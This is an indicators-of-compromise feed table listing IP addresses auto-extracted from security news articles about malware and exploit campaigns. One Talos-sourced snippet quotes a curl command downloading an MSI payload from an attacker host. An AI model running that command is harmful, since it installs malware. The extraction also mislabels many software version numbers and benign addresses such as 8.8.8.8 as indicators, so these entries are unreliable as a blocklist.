Indicators of compromise
306 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| ipv4 | 85.93.0.72 | 4 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 85.93.0.81 | 3 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 8 | EITest Campaign Evolution: From Angler EK to Neutrino and Rig Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 104.193.252.236 | hechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthi | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 104.193.252.241 | litigators.esteroscreen[.]com Bedep post-infection traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 - | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 162.244.34.11 | eroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - all | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 185.118.164.42 | the Afraidgate campaign are shown below. Figure 3: Gate on 185.118.164.42 leads to Angler EK/Bedep/CryptXXX on Friday 2016-04-22. Fig | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 192.169.189.167 | ]org 85.25.160.124 port 80 - mcimaildmz.dinnerplate.co[.]uk 192.169.189.167 port 80 - candidulumbestuurlijk.newlandsierrarealestate[.]c | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 192.169.190.97 | rt 80 - candidulumbestuurlijk.newlandsierrarealestate[.]com 192.169.190.97 port 80 - frageboegen-plletyksin.breastcanceroutreach[.]com | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 207.182.148.92 | bloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - o | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 209.126.120.8 | .97 port 80 - reikleivn-azarashi.orlandohomesbydevito[.]com 209.126.120.8 port 80 - litigators.esteroscreen[.]com Bedep post-infectio | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 217.23.6.40 | mjobrkn3[.]eu (using a VM) CryptXXX post-infection traffic: 217.23.6.40 port 443 (custom encoding) | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 5.199.141.203 | yfczmludodohkdqnij[.]com (using a VM) Click-fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - ceti | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 85.25.160.124 | et.jacquieleebrasil.com[.]br - GET /js/script.js Angler EK: 85.25.160.124 port 80 - bintiye.helpthevets[.]org 85.25.160.124 port 80 - | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 85.25.79.211 | ici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - oqpwldjc.mjobrkn3[.]eu (using a VM) CryptXXX post | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 93.190.141.27 | fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - ted | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 95.211.205.218 | rdinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - rero | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 95.211.205.228 | traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 - yfczmludodohkdqnij[.]com (using a VM) Click-fraud | Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 185.117.153.176 | 50.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.117.153.176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185. | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 185.118.66.83 | .176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185.118.66.83 port 80 - 185.118.66.83 - POST /upload/_dispatch.php Domain | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 185.140.33.76 | ored[.]top 5.2.72.236 port 80 - yegoxmvzpx.bsuperpink[.]top 185.140.33.76 port 80 - erfxsnvj.mafterred[.]top 185.140.33.76 port 80 - | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 185.140.33.99 | rred[.]top 185.140.33.76 port 80 - hxmst.rautumngreen[.]top 185.140.33.99 port 80 - bkhrdfngwg.blueelizabeth[.]top 185.140.33.99 port | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 185.5.250.135 | 54.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5.250.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.11 | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 188.166.38.125 | 1 port 80 - start.puterasyawal[.]com - GET /js/addOnLoad.js 188.166.38.125 port 80 - nepal.laderatutors[.]com - GET /rokmediaqueries.j | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 46.101.26.161 | compromise associated with the Afraidgate campaign: Gates: 46.101.26.161 port 80 - leon.stmaryschooldmt[.]com - GET /scripts/jquery. | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 5.187.0.137 | .253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.5 | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 5.2.72.114 | .yintored[.]top 5.2.72.236 port 80 - bkubf.bsuperpink[.]top 5.2.72.114 port 80 - iynwzttqd.hautumngreen[.]top 5.2.72.236 port 80 - | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 5.2.72.236 | zine.polatoglumimarlik[.]com - GET /to_top.js Neutrino EK: 5.2.72.236 port 80 - avukytj.oautumnyellow[.]top 5.2.72.236 port 80 - | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 5.9.253.173 | rklfdprel.blueelizabeth[.]top Locky post-infection traffic: 5.9.253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0. | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 77.222.54.202 | 87.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.54.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5. | Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky Palo Alto Unit 42 | · Aug 17, 2026 |
| ipv4 | 207.174.0.143 | timately pointing to a live WsgiDAV-based staging server at 207.174.0.143:8080.” reads the report published by Securonix. “Victims wh | SMOKE#SCREEN Campaign Abuses ScreenConnect to Give Attackers Remote Control Access Security Affairs | · Aug 9, 2026 |
| ipv4 | 7.0.9.1 | FMC Software - 7.0 - Cisco_Firepower_Mgmt_Center_Hotfix_GB-7.0.9.1-3.sh.REL.tar 7.2 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7. | Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data The Hacker News | · Aug 6, 2026 |
| ipv4 | 7.2.11.1 | .1-3.sh.REL.tar 7.2 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.11.1-4.sh.REL.tar 7.4 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7. | Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data The Hacker News | · Aug 6, 2026 |
| ipv4 | 7.4.7.1 | .1-4.sh.REL.tar 7.4 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.7.1-3.sh.REL.tar 7.6 - Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7. | Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data The Hacker News | · Aug 6, 2026 |
| ipv4 | 7.6.5.1 | .1-3.sh.REL.tar 7.6 - Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.5.1-2.sh.REL.tar 7.7 - Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7. | Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data The Hacker News | · Aug 6, 2026 |
| ipv4 | 7.7.12.1 | .1-2.sh.REL.tar 7.7 - Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.12.1-2.sh.REL.tar 10.0 - Cisco_Secure_FW_Mgmt_Center_Hotfix_P-10 | Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data The Hacker News | · Aug 6, 2026 |
| ipv4 | 206.72.242.124 | shed three IP addresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to block them and ch | U.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog Security Affairs | · Aug 5, 2026 |
| ipv4 | 206.72.242.162 | dresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to block them and check logs for sig | U.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog Security Affairs | · Aug 5, 2026 |
| ipv4 | 8.19.75.217 | ny also published three IP addresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to b | U.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog Security Affairs | · Aug 5, 2026 |
| ipv4 | 104.243.35.63 | match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to originate from p | Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE The Hacker News | · Aug 3, 2026 |
| ipv4 | 216.152.148.54 | compromise (IoCs), all of which match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion ema | Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE The Hacker News | · Aug 3, 2026 |
| ipv4 | 216.152.151.204 | s), all of which match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to or | Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE The Hacker News | · Aug 3, 2026 |
| ipv4 | 5.180.41.35 | hared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to originate from previously co | Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE The Hacker News | · Aug 3, 2026 |
| ipv4 | 6.1.7.10 | h 8.0.5, and Rails 8.1.0 through 8.1.3. Rails 6.0.0 through 6.1.7.10 releases are affected only when Active Storage is configure | Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads The Hacker News | · Jul 31, 2026 |
| ipv4 | 7.2.3.1 | tt Security list the affected ranges as Rails 7.0.0 through 7.2.3.1, Rails 8.0.0 through 8.0.5, and Rails 8.1.0 through 8.1.3. | Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads The Hacker News | · Jul 31, 2026 |
| ipv4 | 7.2.3.2 | no backport, so affected applications must upgrade to Rails 7.2.3.2 or later. Operators should upgrade to Rails 7.2.3.2, 8.0.5. | Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads The Hacker News | · Jul 31, 2026 |
| ipv4 | 8.0.5.1 | .2.3.2 or later. Operators should upgrade to Rails 7.2.3.2, 8.0.5.1, or 8.1.3.1 and rotate every secret readable by the applica | Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads The Hacker News | · Jul 31, 2026 |
| ipv4 | 8.1.3.1 | ter. Operators should upgrade to Rails 7.2.3.2, 8.0.5.1, or 8.1.3.1 and rotate every secret readable by the application process | Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads The Hacker News | · Jul 31, 2026 |
| ipv4 | 1.1.4.4 | Internet & Security Agency (KISA) says AnySign4PC versions 1.1.4.4 through 1.1.4.6 are affected and lists version 1.1.5.0 as t | Hackers Exploit AnySign4PC via Hacked Korean Sites to Install Backdoors Without Prompts The Hacker News | · Jul 30, 2026 |
| ipv4 | 1.1.4.6 | rity Agency (KISA) says AnySign4PC versions 1.1.4.4 through 1.1.4.6 are affected and lists version 1.1.5.0 as the fixed release | Hackers Exploit AnySign4PC via Hacked Korean Sites to Install Backdoors Without Prompts The Hacker News | · Jul 30, 2026 |
| ipv4 | 7.0.9.1 | ease Hot Fix Name 7.0 Cisco_Firepower_Mgmt_Center_Hotfix_GB-7.0.9.1-3.sh.REL.tar 7.2 Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2. | U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog Security Affairs | · Jul 30, 2026 |
| ipv4 | 7.2.11.1 | .9.1-3.sh.REL.tar 7.2 Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.11.1-4.sh.REL.tar 7.4 Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4. | U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog Security Affairs | · Jul 30, 2026 |
| ipv4 | 7.4.7.1 | 11.1-4.sh.REL.tar 7.4 Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.7.1-3.sh.REL.tar 7.6 Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6. | U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog Security Affairs | · Jul 30, 2026 |
| ipv4 | 7.6.5.1 | .7.1-3.sh.REL.tar 7.6 Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.5.1-2.sh.REL.tar 7.7 Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7. | U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog Security Affairs | · Jul 30, 2026 |
| ipv4 | 7.7.12.1 | .5.1-2.sh.REL.tar 7.7 Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.12.1-2.sh.REL.tar 10.0 Cisco_Secure_FW_Mgmt_Center_Hotfix_P-10.0 | U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog Security Affairs | · Jul 30, 2026 |
| ipv4 | 206.72.242.124 | iew the logs to determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 "If compromise is suspected, operators shoul | Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw The Hacker News | · Jul 28, 2026 |
| ipv4 | 206.72.242.162 | determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 "If compromise is suspected, operators should preserve VCO | Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw The Hacker News | · Jul 28, 2026 |
| ipv4 | 5.2.3.14 | llowing versions are affected - VCO 5.2.x releases prior to 5.2.3.14 VCO 6.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prio | Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw The Hacker News | · Jul 28, 2026 |
| ipv4 | 6.1.3.4 | .2.x releases prior to 5.2.3.14 VCO 6.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prio | Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw The Hacker News | · Jul 28, 2026 |
| ipv4 | 6.4.2.4 | 6.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prior to 7.0.0.1 Arista acknowledged tha | Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw The Hacker News | · Jul 28, 2026 |
| ipv4 | 7.0.0.1 | 6.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prior to 7.0.0.1 Arista acknowledged that the vulnerability was externally d | Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw The Hacker News | · Jul 28, 2026 |
| ipv4 | 8.19.75.217 | them and review the logs to determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 "If compromise is suspected, | Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw The Hacker News | · Jul 28, 2026 |
| ipv4 | 51.89.204.28 | ative networking functions, and the command server address, 51.89.204.28 on port 4444, is baked directly into the binary rather than | MedusaHVNC Trojan Creates Hidden Desktops to Hijack Browsers and Steal Data Security Affairs | · Jul 27, 2026 |
| ipv4 | 8.8.8.8 | people already have. Switching to a hardcoded resolver like 8.8.8.8 doesn’t save you, because the query still leaves the laptop | Hackers Hijack Hotel Wi Security Affairs | · Jul 26, 2026 |
| ipv4 | 104.194.9.14 | .54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 21 | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 104.243.35.131 | associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.2 | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 104.243.35.63 | 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker command-and-control address) Web shel | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 172.111.38.31 | icators of compromise (IoCs) associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104. | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 185.227.83.236 | .146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5 | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 209.222.98.44 | 5.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 216.152.148.54 | promise (IoCs) associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104 | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 216.152.151.204 | 14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker command-and-control add | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 38.60.157.212 | /24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker command | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 5.180.41.35 | - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 7 | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 74.50.76.146 | the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185. | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 78.128.113.10 | 5 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (At | CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue The Hacker News | · Jul 25, 2026 |
| ipv4 | 172.86.126.18 | this traffic will pass through undetected. curl.exe http://172.86.126.18:443/update_ms.msi -o C:\programdata\update_ms.msi The prope | Chaos ransomware's msaRAT: Living off the browser to build a covert C2 channel Cisco Talos | · Jul 23, 2026 |
| ipv4 | 82.114.160.93 | itional Netsweeper devices on YemenNet on two IP addresses: 82.114.160.93 and 82.114.160.94. The device identified on 82.114.160.98 w | Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict/yemen-internet Recorded Future | · Jul 16, 2026 |
| ipv4 | 82.114.160.98 | : 82.114.160.93 and 82.114.160.94. The device identified on 82.114.160.98 was still up at the time of this analysis. The re-emergence | Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict/yemen-internet Recorded Future | · Jul 16, 2026 |
| ipv4 | 179.43.166.242 | eporting component. The Info.plist contains the C2 address, 179.43.166.242, hardcoded as an App Transport Security exception, visible | CrashStealer: New macOS Infostealer Uses Signed Apps to Evade Gatekeeper Security Affairs | · Jul 14, 2026 |
| ipv4 | 2.9.99.5 | s here. Treat the Joomla JCE flaw (CVE-2026-48907, fixed in 2.9.99.5) as urgent too, since it is a maximum-severity and on CISA' | Exposed Hacker Server Reveals WP-SHELLSTORM Backdooring Thousands of WordPress Sites The Hacker News | · Jul 10, 2026 |
| ipv4 | 159.198.41.140 | ves the second-stage payload. C2 infrastructure resolves to 159.198.41.140, with tunneling routed through 159.198.32[.]222, and the do | AI-Generated Malware Powers New Armored Likho APT Campaign Security Affairs | · Jul 7, 2026 |
| ipv4 | 1.2.0.14 | mpacts multiple versions of the firmware - US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE U | CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware The Hacker News | · Jul 7, 2026 |
| ipv4 | 15.03.06.46 | _W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2 | CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware The Hacker News | · Jul 7, 2026 |
| ipv4 | 15.03.06.48 | N_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2.0RTL_V15.03.06.51_multi_T The backdoor | CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware The Hacker News | · Jul 7, 2026 |
| ipv4 | 15.03.06.51 | TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2.0RTL_V15.03.06.51_multi_T The backdoor functionality is present within the "l | CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware The Hacker News | · Jul 7, 2026 |
| ipv4 | 15.11.0.5 | mware - US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE0 | CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware The Hacker News | · Jul 7, 2026 |
| ipv4 | 62.182.81.38 | likely backend server for the Kairos leak site resolving to 62.182.81.38, hosted on Virtual Systems LLC in Ukraine, an ASN that has | U.S. Government Agency Paid $1M to Data Extortion Group Kairos Security Affairs | · Jul 4, 2026 |
| ipv4 | 45.148.10.212 | . Six IP addresses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217. | FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials Security Affairs | · Jul 4, 2026 |
| ipv4 | 83.142.209.11 | CVE-2025-55182 . Six IP addresses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172. | FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials Security Affairs | · Jul 4, 2026 |
| ipv4 | 83.142.209.194 | ses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indi | FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials Security Affairs | · Jul 4, 2026 |
| ipv4 | 83.142.209.203 | e indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indicator set also i | FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials Security Affairs | · Jul 4, 2026 |
| ipv4 | 94.154.172.43 | .142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indicator set also includes 27 file | FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials Security Affairs | · Jul 4, 2026 |
| ipv4 | 192.0.2.1 | worth 35 points makes an asynchronous connection attempt to 192.0.2.1, an IP address reserved for testing that should never respo | RustDuck: The Botnet That's Still Small but Engineering Like It Plans to Grow Security Affairs | · Jul 1, 2026 |
| ipv4 | 20.12.7.1 | Catalyst SD-WAN - 20.9.9.1 and earlier (Fixed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fix | Cisco Catalyst SD-WAN Manager CVE-2026 The Hacker News | · Jun 25, 2026 |
| ipv4 | 20.12.7.2 | earlier (Fixed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and e | Cisco Catalyst SD-WAN Manager CVE-2026 The Hacker News | · Jun 25, 2026 |
| ipv4 | 20.15.4.4 | xed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fix | Cisco Catalyst SD-WAN Manager CVE-2026 The Hacker News | · Jun 25, 2026 |
| ipv4 | 20.15.4.5 | arlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed | Cisco Catalyst SD-WAN Manager CVE-2026 The Hacker News | · Jun 25, 2026 |
| ipv4 | 20.15.5.2 | ed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3. | Cisco Catalyst SD-WAN Manager CVE-2026 The Hacker News | · Jun 25, 2026 |
| ipv4 | 20.15.5.3 | arlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.1) 26.1.1.1 and earlier (Fixed i | Cisco Catalyst SD-WAN Manager CVE-2026 The Hacker News | · Jun 25, 2026 |
